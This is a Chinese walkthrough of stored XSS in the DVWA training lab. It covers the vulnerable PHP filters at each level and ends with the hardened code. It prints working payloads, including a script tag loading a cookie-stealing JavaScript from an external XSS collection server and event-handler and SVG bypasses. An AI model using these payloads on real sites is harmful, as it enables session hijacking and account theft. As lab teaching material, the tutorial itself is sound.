当前位置: 首页 > wzjs >正文

建设银行人力资源招聘网站企业花钱做的网站出现违禁词

建设银行人力资源招聘网站,企业花钱做的网站出现违禁词,wordpress特效主题免费下载,固始网站建设目录 一、Low级别 1.1 环境与代码分析 1.2 实战攻击演示 二、Medium级别绕过 2.1 防护机制分析 2.2 绕过技术详解 三、高安全级绕过 3.1 严格过滤机制 3.2绕过方案 四、防御体系构建指南 4.1 安全防护对比表 4.2 impossible代码 4.3各安全级别对比表 一、Low级别 …

目录

一、Low级别

1.1 环境与代码分析

1.2 实战攻击演示

二、Medium级别绕过

2.1 防护机制分析

2.2 绕过技术详解

三、高安全级绕过

3.1 严格过滤机制

3.2绕过方案

四、防御体系构建指南

4.1 安全防护对比表

4.2 impossible代码

4.3各安全级别对比表


一、Low级别

1.1 环境与代码分析

安全设置:DVWA Security → Low 漏洞文件vulnerabilities/xss_stored/source/low.php

// 关键漏洞代码:
$message = stripslashes($_POST['mtxMessage']);
$name = stripslashes($_POST['txtName']);
// 直接存入数据库
$query = "INSERT INTO guestbook VALUES ('$message','$name')";
stripslashes() 作用去除字符串中的反斜线转义字符
将 \' 转换为 '
将 \" 转换为 "
将 \\ 转换为 \
将 \0 转换为 NULL 字符

PHP stripslashes() 函数详解-CSDN博客

1.2 实战攻击演示

基础验证Payload

<script>alert(document.cookie)</script>

插入payload代码,刷新页面触发xss

高级利用(插入js)

<script src="http://192.168.21.4/BlueLotus/myjs/cookie.js"></script>

xss平台收到cookie

二、Medium级别绕过

2.1 防护机制分析

安全设置:DVWA Security → Medium 过滤代码medium.php

$message = trim( $_POST[ 'mtxMessage' ] );
$name    = trim( $_POST[ 'txtName' ] );
$message = strip_tags( addslashes( $message ) );
$message = htmlspecialchars( $message );
$name = str_replace( '<script>', '', $name );

trim() 作用

去除字符串首尾空白字符

strip_tags()作用

移除 <div> 标签及其属性
移除 <p> 标签
保留标签间文本内容
移除 <!-- 注释 -->
移除 <b> 标签但保留其内容

htmlspecialchars()作用:

& → &amp;
" → &quot; (当使用 ENT_QUOTES 时)
' → &#039; (当使用 ENT_QUOTES 时)
< → &lt;
> → &gt;

str_replace()作用

过滤name字段中<script>

PHP strip_tags() 函数详解-CSDN博客

PHP addslashes() 函数详解-CSDN博客

2.2 绕过技术详解

技术1:事件处理器绕过

name参数未转义,可插入html代码,输入存在前端字符数限制,增大字符数10-->100,绕过前端限制

<img src=x onerror=alert(/111/)>

或者抓包后,进行修改

通过onerror事件触发xss

技术2:大小写混淆

<ScRiPt>prompt("1")</ScRiPt>

技术3:属性字符突破

<svg><script>alert&#40;1&#41;</script>

代码分析:HTML实体编码部分字符绕过检测

三、高安全级绕过

3.1 严格过滤机制

安全设置:DVWA Security → High 防护代码high.php

$message = trim( $_POST[ 'mtxMessage' ] );
$name    = trim( $_POST[ 'txtName' ] );
$message = strip_tags( addslashes( $message ) );
$message = htmlspecialchars( $message );
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );//过滤字符串中的 <script> 标签及其变体

addslashes()作用

转义特殊字符:
单引号(')→ 转义为 \'
双引号(")→ 转义为 \"
反斜线(\)→ 转义为 \\
NULL 字符(\0)→ 转义为 \0

主要用途:
准备要存入数据库的字符串数据
防止特殊字符破坏字符串结构
处理可能包含危险字符的用户输入

3.2绕过方案

方案1:SVG矢量攻击 --name字段插入

<svg xmlns="http://www.w3.org/2000/svg" onload="alert(2)"/>

图4:SVG命名空间下的XSS执行

方案2:HTML5新特性

<details open ontoggle=alert(1)>

四、防御体系构建指南

4.1 安全防护对比表

防护层低级别漏洞中级别改进高级别方案
输入过滤基础HTML编码严格上下文编码
输出编码部分实现多重编码
CSP策略推荐配置

4.2 impossible代码

<?php
​
if( isset( $_POST[ 'btnSign' ] ) ) {// Check Anti-CSRF tokencheckToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
​// Get input$message = trim( $_POST[ 'mtxMessage' ] );$name    = trim( $_POST[ 'txtName' ] );
​// Sanitize message input$message = stripslashes( $message );$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$message = htmlspecialchars( $message );
​// Sanitize name input$name = stripslashes( $name );$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));$name = htmlspecialchars( $name );
​// Update database$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );$data->bindParam( ':message', $message, PDO::PARAM_STR );$data->bindParam( ':name', $name, PDO::PARAM_STR );$data->execute();
}
​
// Generate Anti-CSRF token
generateSessionToken();
​
?>

用户输入:<script>alert(1)</script>
经过 htmlspecialchars() 转义后存入数据库:
&lt;script&gt;alert(1)&lt;/script&gt;
从数据库读取后直接输出到 HTML 时,浏览器会显示为文本而非执行脚本。

4.3各安全级别对比表

安全级别过滤函数可绕过方式危险程度
Lowstripslashes()任何标准XSS★★★★★
Mediumhtmlspecialchars()事件处理器/大小写★★★☆
Highhtmlspecialchars(ENT_QUOTES)SVG/高级HTML5★★☆

文章转载自:

http://sYqgyTWn.rhdtr.cn
http://z0tgwqZg.rhdtr.cn
http://U0AhrWVv.rhdtr.cn
http://yrptV5FB.rhdtr.cn
http://StIHXpDc.rhdtr.cn
http://QREhATPZ.rhdtr.cn
http://co3GCYFJ.rhdtr.cn
http://dxvQY138.rhdtr.cn
http://vidcVkO1.rhdtr.cn
http://EyEfi60l.rhdtr.cn
http://DDkiqbZ2.rhdtr.cn
http://auURbpmz.rhdtr.cn
http://1utBSt4n.rhdtr.cn
http://BC4SVvqY.rhdtr.cn
http://GimNX1Sq.rhdtr.cn
http://OBZ4AfJF.rhdtr.cn
http://QRhTuaSJ.rhdtr.cn
http://zgktiAok.rhdtr.cn
http://zb8bbnkx.rhdtr.cn
http://pIrVeJ3P.rhdtr.cn
http://ZqybcOAL.rhdtr.cn
http://TgWIEcQp.rhdtr.cn
http://ZMXXrvJa.rhdtr.cn
http://aB3u3s37.rhdtr.cn
http://Qi2meJLi.rhdtr.cn
http://SBDreviq.rhdtr.cn
http://C2aktxRR.rhdtr.cn
http://n7aYcvDe.rhdtr.cn
http://5YgIH5Mf.rhdtr.cn
http://eF449lJR.rhdtr.cn
http://www.dtcms.com/wzjs/709181.html

相关文章:

  • 哪些行业做网站推广的多建设微网站平台
  • 网站公司设计做网站用什么格式的图片
  • 自己做的微课上传到哪个网站xss网站怎么搭建
  • 建设企业网站前市场分析有学做衣服的网站吗
  • 企业网站appwordpress需要登录密码错误
  • 企业网站建设费用的预算网页设计尺寸1440
  • dw网站开发环境网站建设分工说明
  • 信阳做网站公司汉狮价格备案不关闭网站的方法
  • 网站首页 排版电商网站模块设计
  • 查询类网站怎么做南江红鱼洞水库建设管理局网站
  • 网站开发的毕业设计题目网站权重分散
  • 网站怎么做短信ip限定wordpress serene
  • 学做网站赚钱方法做网站和做程序一样吗
  • 自助建站免费申请百度推广北京总部电话
  • 黄石本地做网站的小程序开发北京华网天下首选
  • 做短租公寓民宿网站互联网推广是什么意思
  • 站长工具域名莆田网站制作企业
  • 陶瓷刀具网站策划书郑州团购网站建设
  • 莱芜住房和城乡建设部网站网站建设和推广话术6
  • linux网站建设模板怎么创立网站
  • 个人新闻类网站模板山东国舜建设集团网站
  • 免费php网站空间苏州网站制作方法
  • 中关村做网站设计的做期货看什么网站的资讯
  • 长沙建网站设计商机加盟好项目
  • 网站运营策划书范文爱建站大全网
  • 班级网站模板中小企业网站制作多少钱
  • 化工营销型网站常用的网页设计工具
  • 怎么网站能找人做装修事怎么建设网站赚钱
  • 做自媒体需要关注什么网站电商网站公司
  • 网站开发应该怎么做泰通建设集团网站